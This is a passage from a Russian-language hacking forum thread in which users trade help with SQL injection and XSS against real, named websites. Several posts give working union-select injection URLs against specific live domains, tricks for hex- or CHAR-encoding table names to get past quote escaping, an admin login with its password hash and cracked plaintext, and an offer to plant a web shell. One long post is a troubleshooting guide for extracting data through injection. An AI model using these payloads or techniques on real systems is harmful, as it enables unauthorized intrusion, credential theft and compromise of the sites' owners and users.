Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    кто что знает от xss ddos?

    например через функцию ajax:
    или вот это:
     
    #4521 sabe, 11 Jan 2009
    Last edited: 11 Jan 2009
  2. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Даже не знаю..
    Может там две таблицы admin? Одна лежит в бд к которой ты подключен, но в ней нет колонок "admin_user","admin_password".
    А вторая в другой бд и в ней как раз эти колонки?
    Маловероятно, конечно, но вдруг ^^

    А вообще - лучше линк выкладывать...
     
  3. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Ребята, такой вопрос. Нашол таблицу phpbb_users, при запросе
    http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,column_name,3+from+information_schema.columns+where+table_name=%27phpbb_users%27+limit+1,1
    выбивало ошибку, прочитал весь форум, понял, нада закодирывать...кодирнул в чар...выдаёт тупо пустую страницу....В чём моя ошибка....подскажите плиз..всю ночь просидел.
     
  4. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Возможно, ты кодируешь 'phpbb_users', а нужно phpbb_users. (без кавычек)

    Code:
    http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,column_name,3+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+1,1--
     
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    vakula
    разшифруеш один из двух хешей залью тебе шелл )

    по поводу 1 вопроса дай линк гляну..
     
    #4525 sabe, 11 Jan 2009
    Last edited: 11 Jan 2009
  6. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Всем спасибо.....обидно...я просто не внимательный
     
  7. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Линк на что?

    Я так понимаю хэш нереально розшифривать?
     
  8. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Подскажи плиз, что можна с пасом зделать?

    login:pv
    pass:e4a1767e13d8cae53abc0a69c5e6c3cd

    adminka http://www.cdma.kh.ua/admin
     
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Почему?

    Беря : e73f75e5b7e7924e2949d39762539117 : 21436578
     
  10. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Ты кудесник!!! Обьясни ламеру каким образом ты ето сделал. Плиз
     
  11. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    F.a.q. - всё о хешах : https://forum.antichat.ru/thread26983.html
    On-line cервисы расшифровки md5 : https://forum.antichat.ru/threadnav11028-1-10.html
     
    1 person likes this.
  12. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Вопрос насчет скули..
    http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+102,1--

    вижу, что есть таблица users.
    пытаюсь получить столбцы, но не выхходит =(
    http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'--

    помогите, пожалуйста - тут чистый интерес.
     
  13. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    wildshaman

    Кавычки не жрёт

    Зехекси users и перебирай.

    http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7573657273--

    выводит нормально.
     
    2 people like this.
  14. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Спс, я б сам не догадался)
     
  15. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Не подскажите нуда XSS вставлять в этом коде?
    Или путь до JS
    XSS для IPB v2.1.7



    Если ставлю вместо
    вот такое
    то всё ок но после перехода по картинке (которая образованна XSS) выходит сообщение:
    "Некоторые требуемые файлы отсутствуют. Если вы хотели просмотреть тему, возможно эта тема перемещена или удалена. Вернитесь назад и попробуйте снова."

    также пробовал вставить туда
    Ошибка таже...
     
    #4535 Byrger, 11 Jan 2009
    Last edited: 11 Jan 2009
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Гоняем одни и те-же вопросы по кругу.

    Господа, вывод это не мёд (вроде есть, и сразу нет), он или есть, или нет.

    Если Вы видите вывод цифры, то он есть 100%, а невозможность вывода данных может быть только в нескольких случаях

    1 Таблица пустая
    Проверяется count(*)
    union+select+1,2,count(*),4+from+user
    либо для 5 ветки так
    union+select+1,table_rows+from+information_schema.tables+where+table_name='user'
    Если ковычки слешируются, перевести название таблицы/колонки в hex или в CHAR, кому как нравится
    Для hex это выглядит так(добавляем к hex впереди 0x что-бы база поняла, что за данные мы ей втюхиваем):
    union+select+1,table_rows+from+information_schema.tables+where+table_name=0x7573657273
    для CHAR так:
    union+select+1,table_rows+from+information_schema.tables+where+table_name=char(117,115,101,114,115)
    Как видим обошлись без ковычек (сдесь table_name=users)
    Некоторые индивидумы умудряются загонять в хекс или чар вместе с ковычками, тоесть так 'users'=27757365727327, так делать ненадо, я Вас умоляю )
    Внимание, операторы, функции, и т.д переводить в hex или char нельзя(точнее, переводить то можно, но база Вас не поймёт ))
    2 Таблица в другой базе
    В базе information_schema хранится информация обо всех таблицах и столбцах из всех баз, и есть вероятность того, что ваша таблица находится не в той базе с которой работает скрипт
    Проверяем(5 ветка) :
    table_schema+from+information_schema.tables+where+table_name='user', а база с которой работает скрипт выводится database(). Если базы разные, пробуем обратится к той которая нужна
    union+select+1,2,count(*),4+from+base.user (по аналогии с mysql.user)
    3 Несоответствие кодировки
    Что-бы получить данные в нужной нам кодировке можно пользоваться либо функциями приведения типов:
    cast(Version()+as+binary)
    CONVERT(Version(),binary)
    convert(version()+using+latin1)

    Либо шифровать/дешифровать данные. Результат при этом возвращается уже в "правильной" кодировке
    aes_decrypt(aes_encrypt(Version(),1),1)
    unhex(hex(version()))

    4 Несоответствие типа данных
    MySql к типам данных лоялен, а вот другие базы нет.Если база не mysql, читаем статьи по своей базе и приводим данные к нужному типу.
    5 Закрыт доступ к таблице\базе
    Опять-же, в mysql нельзя ограничить доступ к таблице, (можно только к базе), а в некоторых других базах можно

    *Все примеры даны для mysql , в других базах другой синтаксис(читаем статьи)

    Это основные причины невозможности вывода данных, которые решат 99% ваших вопросов.
     
    6 people like this.
  17. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    jokester
    Молодец конечно, за старания +, но дело в том, что сейчас твой пост в следующей паре затеряется и все вопросы начнут прогонять по кругу.Одни и те же.
    ЛЮДИ, читайте тему! На любой ваш вопрос здесь 99% уже есть ответ, и не один!
    На банальные вопросы в скором времени вам никто отвечать не будет, будете обижаться.Включайте мозг, и платите налоги =)
     
    1 person likes this.
  18. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Вот вопрсоег.
    http://www.electionguide.org/country-news.php?ID=208+GROUP+BY+8+-- - ошибка не выводится, значит столбцов 8.
    Делаю запрос http://www.electionguide.org/country-news.php?ID=208+UNION+SELECT+1,2,3,4,5,6,7,8+--
    А мне пишет:
    Query Error: The used SELECT statements have a different number of columns
    Как будто количество неверно...
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Потому что там вот такая ошибка идет:

    Code:
    http://www.electionguide.org/country-news.php?ID=208+order+by+10--
    
    LEFT JOIN, или искать уязвимость в другом месте, или фактически blind sql-inj
     
    1 person likes this.
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Используй order+by

    Нет ошибки:

    Code:
    http://www.electionguide.org/country-news.php?ID=208+order+by+50--
    Ошибка:

    Code:
    http://www.electionguide.org/country-news.php?ID=208+order+by+51--
    Итого:

    Code:
    http://www.electionguide.org/country-news.php?ID=-208+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0--
    Вывод в title.
     
    #4540 R1dex, 11 Jan 2009
    Last edited: 11 Jan 2009
    3 people like this.
Thread Status:
Not open for further replies.